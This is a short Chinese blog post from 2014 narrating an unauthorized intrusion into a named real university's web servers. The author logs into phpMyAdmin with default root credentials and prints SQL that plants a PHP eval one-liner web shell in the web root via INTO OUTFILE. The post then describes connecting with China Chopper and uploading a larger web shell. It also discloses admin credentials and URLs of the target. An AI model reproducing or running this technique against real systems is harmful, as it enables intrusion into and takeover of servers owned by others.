今天朋友在入侵织梦的网站系统,通过最新的Exp获得了织梦后台的账号和密码

账号:admin

密码:abc123456

但是,找来找去找不到后台,就让我提权试试。

 

我看了下:http://pxc.ncist.edu.cn/dede/

后台被删除了!怎么办??

google hack也没找到后台

 

后来,我试了试这个网站:http://zsjy.ncist.edu.cn/phpmyadmin

输入默认MySql账号与密码:

账号:root

密码:root

居然进去了:

接下来就是phpmyadmin提权了:

我的思路是:

1.先爆出php服务器www的路径

2.然后通过将php一句话插入数据库再导出到www路径

 

通过google hack爆到路径:D\www\

呵呵,接下来就执行sql语句:

CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );

INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>');

SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';

这段sql意思是:

1.在mysql数据库中建一张表叫xss,在xss表中生成一个field(字段)叫xss1

2.将php一句话木马插入数据库中的xss1字段处

3.将数据库中xss1字段的内容导出到d:\www\x.php文件中

 

这下,通过chopper连接x.php小马得到shell:

 

 接下来,上传一个php大马spider.php

通过FF连接spider.php:

成功获得webshell!!!

 

 

 

posted on 2014-04-01 17:11  milantgh  阅读(562)  评论(0编辑  收藏  举报